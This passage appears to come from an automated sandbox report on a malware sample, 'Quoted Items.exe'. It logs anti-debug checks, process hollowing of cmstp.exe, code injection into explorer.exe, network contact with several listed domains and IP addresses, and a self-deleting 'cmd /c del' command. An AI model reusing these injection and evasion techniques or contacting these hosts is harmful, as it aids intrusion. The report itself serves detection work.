          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05192073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05153884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05153884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05103B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05103B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05102397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0518D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05104BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05104BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05104BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051053C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051823E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051823E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051823E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05114A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05114A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05164257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0511927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0518B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0518B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05102ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05102AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\Quoted Items.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.zhouyihong.top
          Source: C:\Windows\explorer.exeNetwork Connect: 180.76.158.103 80
          Source: C:\Windows\explorer.exeDomain query: www.gratefulgrandmas.com
          Source: C:\Windows\explorer.exeDomain query: www.royaltortoisecookieco.online
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.168.19 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Quoted Items.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 1230000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Quoted Items.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Quoted Items.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Quoted Items.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Quoted Items.exeMemory written: C:\Users\user\Desktop\Quoted Items.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Quoted Items.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Quoted Items.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3968
          Source: C:\Users\user\Desktop\Quoted Items.exeProcess created: C:\Users\user\Desktop\Quoted Items.exe C:\Users\user\Desktop\Quoted Items.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quoted Items.exe"
          Source: explorer.exe, 00000005.00000000.305101849.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.326753405.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.374845928.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.331301300.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.298445509.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.288816660.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.288816660.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.375172298.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.327172842.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.288816660.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.375172298.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.327172842.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.326871038.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.374983831.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.288291734.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.288816660.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.375172298.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.327172842.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Users\user\Desktop\Quoted Items.exe VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
